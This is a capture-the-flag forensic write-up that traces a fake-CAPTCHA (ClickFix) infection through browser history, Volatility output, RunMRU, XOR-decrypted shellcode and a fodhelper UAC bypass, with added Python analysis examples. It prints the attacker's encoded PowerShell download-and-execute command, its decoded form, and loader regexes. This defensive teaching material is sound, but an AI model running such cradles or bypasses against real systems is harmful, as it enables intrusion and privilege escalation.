WannaGame Championship 2025 - Writeup
Hide and Seek – Forensic Investigation Report
The victim reported that after browsing and downloading some files, suspicious processes began appearing on the system. Our objective is to reconstruct the attack chain and identify the adversary’s techniques.
[1] MITRE ATT&CK ID for Initial Access (TXXXX.XXX)
Browser history analysis (Firefox) revealed that the user accessed a suspicious internal URL shortly before malicious activity began.
There is no indication of an exploit chain or drive-by download. Instead, the evidence suggests that the victim was socially engineered into clicking a malicious link.
This behavior aligns with:
Phishing via malicious link
MITRE ATT&CK mapping: Phishing: Spearphishing Link
Answer: T1566.002
[2] Which link did the victim access? (ASCII)
The final suspicious entry in the browser history shows:
http://192.168.1.11:7331/captcha.html
This appears to be a fake CAPTCHA page used to trick the victim into executing a command (the pattern commonly called ClickFix: the page puts a command on the clipboard and instructs the user to paste it into the Run dialog to "verify" they are human).
Answer:
http://192.168.1.11:7331/captcha.html
[3] What command was the victim tricked into executing? (ASCII)
Using Volatility's cmdline plugin (windows.cmdline in Volatility 3), we examined process command-line arguments and identified a PowerShell process launched with -eC (short for -EncodedCommand), i.e. carrying a base64-encoded payload:
powershell.exe -eC aQB3AHIAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAxADoANwAzADMAMQAvAHkALgBwAHMAMQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAaQBlAHgA
-EncodedCommand takes the script as UTF-16LE and then base64 (which is why the blob shows the "AA" pattern every other character). Decoding it gives:
iwr http://192.168.1.11:7331/y.ps1 -UseBasicParsing | iex
Explanation:
iwr (Invoke-WebRequest) downloads y.ps1 from the attacker's server
| pipes the script text to
iex (Invoke-Expression), which executes it directly in memory, so the script itself never touches disk
This is a typical “download-and-execute” (download cradle) technique.
Answer:
powershell.exe -eC aQB3AHIAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAxADoANwAzADMAMQAvAHkALgBwAHMAMQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAaQBlAHgA
[4] What URL was used to retrieve the payload and what filename was it saved as?
(http://example.com/script.ext_file.rar)
After dumping the PowerShell process memory (PID 3000), we recovered the executed script content.
The script:
Downloads update.zip
Saves it as kqwer.zip in %TEMP%
Extracts it
Executes verify.exe
Relevant snippet recovered from memory:
$url1 = "http://192.168.1.11:7331/update.zip"
$zipPath1 = "$env:TEMP\kqwer.zip"
Therefore:
Script URL: http://192.168.1.11:7331/y.ps1
Saved filename: kqwer.zip
Answer:
http://192.168.1.11:7331/y.ps1_kqwer.zip
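Recovering the script from the dumped powershell.exe memory comes down to carving strings in both encodings (.NET keeps script text as UTF-16LE, while other artefacts are ASCII) and then picking out the variable assignments and URLs. The block below is an added example, not the writeup's own tooling: the memory "dump" is a constructed byte string containing only the two script lines quoted above, the carving regexes are this example's own, and the TEMP path for the victim account is inferred from the malware location reported in question [6] (an assumption).

```python
import re

# Constructed stand-in for a chunk of the dumped powershell.exe memory: the two script lines
# quoted in the writeup, stored the way .NET keeps strings (UTF-16LE), surrounded by filler.
SCRIPT_LINES = [
    '$url1 = "http://192.168.1.11:7331/update.zip"',
    '$zipPath1 = "$env:TEMP\\kqwer.zip"',
]
DUMP = (
    bytes(range(16)) + b"\x00" * 8
    + "\r\n".join(SCRIPT_LINES).encode("utf-16-le")
    + b"\x00" * 6 + b"MZ\x90\x00" + b"\x00" * 8
    + b"-UseBasicParsing" + b"\x00" * 4
)

# TEMP for the victim account, inferred from the malware path in question [6] (assumption).
ENV = {"TEMP": r"C:\Users\imnoob\AppData\Local\Temp"}

ASCII_RE = re.compile(rb"[\x20-\x7e]{8,}")
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"')
URL_RE = re.compile(r'https?://[^\s\'"|;)]+')
ENV_RE = re.compile(r"(?i)\$env:(\w+)")


def carve_strings(data: bytes):
    """Yield (offset, encoding, text) for printable ASCII and UTF-16LE runs of 8+ chars,
    the same idea as running strings with -a and again with -el."""
    for m in ASCII_RE.finditer(data):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RE.finditer(data):
        yield m.start(), "utf-16le", m.group().decode("utf-16-le")


def expand_env(value: str, env: dict) -> str:
    """Resolve $env:NAME references (case-insensitive) so paths match what hit the disk."""
    upper = {k.upper(): v for k, v in env.items()}
    return ENV_RE.sub(lambda m: upper.get(m.group(1).upper(), m.group(0)), value)


def recover_script_artifacts(data: bytes, env: dict) -> dict:
    """Pull $var = "..." assignments and URLs out of carved strings; paths are env-expanded."""
    assignments, urls = {}, set()
    for _offset, _encoding, text in carve_strings(data):
        for name, value in ASSIGN_RE.findall(text):
            assignments[name] = expand_env(value, env)
        urls.update(URL_RE.findall(text))
    return {"assignments": assignments, "urls": sorted(urls)}


if __name__ == "__main__":
    print(recover_script_artifacts(DUMP, ENV))
```

On a real dump, read the file produced by the Volatility memory dump in place of DUMP; the env-expanded zipPath1 is the on-disk path to check against the $MFT or USN journal for the kqwer.zip write.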
[5] MITRE ID and Registry location (TXXXX_Hive\Key)
Process tree analysis showed:
explorer.exe → powershell.exe
explorer.exe spawning powershell.exe directly (rather than a browser or an Office process doing so) points to an interactive launch, which in the fake-CAPTCHA scenario means the victim pasted the command into the Run dialog (Win + R).
To confirm, we examined the following registry key:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
This key stores the commands typed into the Run dialog: each entry is a single-letter value whose data ends in "\1", and the MRUList value records their order with the most recent first.
The corresponding MITRE technique:
User Execution
Answer:
T1204_HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
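Reading RunMRU by hand is error-prone because the value names (a, b, c, ...) say nothing about recency; only MRUList does, and every entry carries a trailing "\1". The following added example (not part of the original writeup) orders the entries correctly, strips the suffix, and flags the ones that look like loaders. The value set is constructed: only the encoded PowerShell entry corresponds to what the writeup found; the other two are placeholders for older Run history.

```python
import re

# Constructed RunMRU values, in the shape Volatility's windows.registry.printkey shows for
# HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. Only entry "b" reflects
# the writeup's finding; "a" and "c" are made-up older history.
RUNMRU_VALUES = {
    "a": "cmd\\1",
    "b": "powershell.exe -eC aQB3AHIAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAxADoANwAzADMAMQAvAHkALgBwAHMAMQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAaQBlAHgA\\1",
    "c": "notepad\\1",
    "MRUList": "bca",  # most recent first
}

# Heuristics for what should never show up in a user's Run history (this example's assumption).
ENCODED_PS_RE = re.compile(r"(?i)powershell(?:\.exe)?.*\s-e[a-z]*\s+[A-Za-z0-9+/=]{16,}")
CRADLE_RE = re.compile(r"(?i)\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression|mshta|curl|bitsadmin)\b")


def runmru_history(values: dict) -> list:
    """Return Run-dialog commands most-recent-first, with the '\\1' suffix stripped."""
    history = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue  # MRUList can still name a slot whose value was deleted
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def flag_suspicious(history: list) -> list:
    """Return (position, command, reason) for entries matching loader patterns."""
    hits = []
    for i, cmd in enumerate(history):
        if ENCODED_PS_RE.search(cmd):
            hits.append((i, cmd, "encoded PowerShell command"))
        elif CRADLE_RE.search(cmd):
            hits.append((i, cmd, "download/execute cradle"))
    return hits


if __name__ == "__main__":
    for position, cmd, reason in flag_suspicious(runmru_history(RUNMRU_VALUES)):
        print(f"#{position}: {reason}: {cmd[:60]}...")
```

Position 0 in the returned history is the last thing the user ran; matching it against the cmdline and browser-history timestamps ties the Run-dialog entry to the fake CAPTCHA visit.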
[6] Malicious file location and injected process (C:\path\folder\A_processA.ext_1234)
The downloaded archive extracted and executed:
verify.exe
Static analysis using IDA revealed:
The binary decrypts embedded shellcode using XOR
Key used: 6ddLG9a8gc69cf4J0bZrzgGjr9zRMR
The decrypted shellcode is injected into explorer.exe
Observed process hierarchy:
explorer.exe (PID 6500)
└── powershell.exe (3000)
└── verify.exe
Malware location:
C:\Users\imnoob\AppData\Local\Temp\file
Injected process:
explorer.exe (PID 6500)
Answer:
C:\Users\imnoob\AppData\Local\Temp\file_explorer.exe_6500
[7] Attacker IP and PORT inside injected shellcode (IP:PORT)
After decrypting the shellcode and disassembling it, we found two immediates pushed back to back, which is how an x86 reverse_tcp stager builds its sockaddr_in on the stack:
PUSH 0B01A8C0
PUSH A5FB0002
Reading the immediates as the little-endian bytes they leave in memory:
0B01A8C0 → C0 A8 01 0B → sin_addr 192.168.1.11
A5FB0002 → 02 00 FB A5 → sin_family 0x0002 (AF_INET), then sin_port as bytes FB A5, which in network byte order is 0xFBA5 = 64421
(Note the byte order: the port is not 0xA5FB as the immediate suggests; sin_port is stored big-endian.)
This indicates a reverse shell connection back to the attacker.
Answer:
192.168.1.11:64421
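The two steps from questions [6] and [7], XOR-decrypting the embedded blob and then reading the C2 endpoint out of the push-push sockaddr_in pattern, are shown together in the added example below; it is not the writeup's own code. The XOR key is the one recovered from verify.exe, and repeating-key XOR is assumed because the writeup names the key but not how it cycles. The encrypted sample is constructed: a few stager-like bytes around the two pushes from the disassembly, encrypted with that key so the decrypt step is exercised end to end.

```python
import re
import socket
import struct

# XOR key recovered from verify.exe (from the writeup).
XOR_KEY = b"6ddLG9a8gc69cf4J0bZrzgGjr9zRMR"


def xor_crypt(blob: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so the same call encrypts and decrypts.
    Assumption: the writeup names the key but not the cycling scheme; repeating-key is the usual one."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


# x86 reverse_tcp stagers build the sockaddr_in on the stack with two PUSH imm32, so the
# IP and port appear as consecutive immediates in the raw shellcode:
#   68 <4 bytes>        push sin_addr            ; bytes are already in network order
#   68 02 00 <2 bytes>  push sin_port:sin_family ; 0x0002 = AF_INET, then the big-endian port
SOCKADDR_PUSH = re.compile(rb"\x68(?P<ip>.{4})\x68\x02\x00(?P<port>.{2})", re.DOTALL)


def sockaddr_from_immediates(ip_imm: int, port_imm: int):
    """Decode the two immediates as IDA prints them (PUSH 0B01A8C0 / PUSH A5FB0002)."""
    ip = socket.inet_ntoa(struct.pack("<I", ip_imm))  # little-endian store -> C0 A8 01 0B
    family, port_be = struct.unpack("<H2s", struct.pack("<I", port_imm))  # 02 00 | FB A5
    if family != 2:  # AF_INET
        raise ValueError(f"not an AF_INET sockaddr: family={family:#x}")
    return ip, struct.unpack("!H", port_be)[0]  # FB A5 read big-endian = 0xFBA5 = 64421


def find_reverse_tcp_targets(shellcode: bytes) -> list:
    """Scan decrypted shellcode for the push-push sockaddr_in pattern; return (ip, port) pairs."""
    return [
        (socket.inet_ntoa(m.group("ip")), struct.unpack("!H", m.group("port"))[0])
        for m in SOCKADDR_PUSH.finditer(shellcode)
    ]


# Constructed sample: stager-like bytes around the two pushes from the writeup's disassembly,
# XOR-encrypted with the recovered key (so ENCRYPTED_BLOB is this example's data, not verify.exe's).
_PLAIN = (
    b"\xfc\xe8\x82\x00\x00\x00" + b"\x90" * 8   # cld ; call ... ; padding
    + b"\x68\xc0\xa8\x01\x0b"                   # push 0x0B01A8C0  (192.168.1.11)
    + b"\x68\x02\x00\xfb\xa5"                   # push 0xA5FB0002  (AF_INET, port 64421)
    + b"\x89\xe6\x6a\x10\x56\x57"               # mov esi, esp ; push 0x10 ; push esi ; push edi
    + b"\x90" * 8
)
ENCRYPTED_BLOB = xor_crypt(_PLAIN, XOR_KEY)


def analyse(blob: bytes, key: bytes) -> list:
    """Decrypt the embedded blob the way verify.exe does and pull the C2 endpoints out of it."""
    return find_reverse_tcp_targets(xor_crypt(blob, key))


if __name__ == "__main__":
    print(sockaddr_from_immediates(0x0B01A8C0, 0xA5FB0002))
    print(analyse(ENCRYPTED_BLOB, XOR_KEY))
```

To use this on the real sample, carve the encrypted resource out of verify.exe at the offset IDA shows being passed to the XOR loop and pass it as blob; the pattern scan is only meaningful on the decrypted bytes, which is why the encrypted blob yields nothing.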
[8] Process used for UAC bypass and PPID spoofing (ProcessA.ext_1234)
Further analysis showed:
powershell.exe -ExecutionPolicy Bypass
→ fodhelper.exe
fodhelper.exe is a Microsoft-signed, auto-elevating binary that is frequently abused for UAC bypass: it resolves the ms-settings protocol handler under HKCU\Software\Classes, which a standard user can write, so a command planted there runs at high integrity without a consent prompt (MITRE ATT&CK T1548.002, Bypass User Account Control).
Observed relationship:
powershell.exe (PID 5888)
└── fodhelper.exe (PID 2964)
This confirms privilege escalation via UAC bypass.
Answer:
fodhelper.exe_5888
Final Flag
W1{conGR4TUIaTi0N5-9OU-Fin4ILy-fOUND-m3!ll10dc}